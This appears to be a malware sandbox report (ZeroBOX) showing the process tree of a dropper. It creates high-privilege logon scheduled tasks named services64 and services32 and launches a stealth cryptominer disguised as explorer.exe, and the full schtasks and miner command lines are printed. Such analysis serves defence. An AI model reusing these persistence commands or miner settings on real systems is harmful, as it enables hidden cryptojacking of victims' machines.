| ZeroBOX

svchost.exe "C:\Users\test22\AppData\Local\Temp\svchost.exe"
2412
- f1_prot.exe "C:\Users\test22\AppData\Local\Temp\RarSFX0\f1_prot.exe"
  2524
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
    2704
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
      2764
  - services64.exe "C:\Users\test22\AppData\Local\Temp\services64.exe"
    2872
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"' & exit
      3044
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\test22\AppData\Local\Temp\services64.exe"'
        2144
    - sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      2552
    - explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
      2796
- f2_prot.exe "C:\Users\test22\AppData\Local\Temp\RarSFX0\f2_prot.exe"
  2948
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
    2372
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'
      2188
  - services32.exe "C:\Users\test22\AppData\Local\Temp\services32.exe"
    2480
    - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"' & exit
      1604
      - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\test22\AppData\Local\Temp\services32.exe"'
        3060
    - sihost32.exe "C:\Users\test22\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
      2616
explorer.exe C:\Windows\Explorer.EXE
1236

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents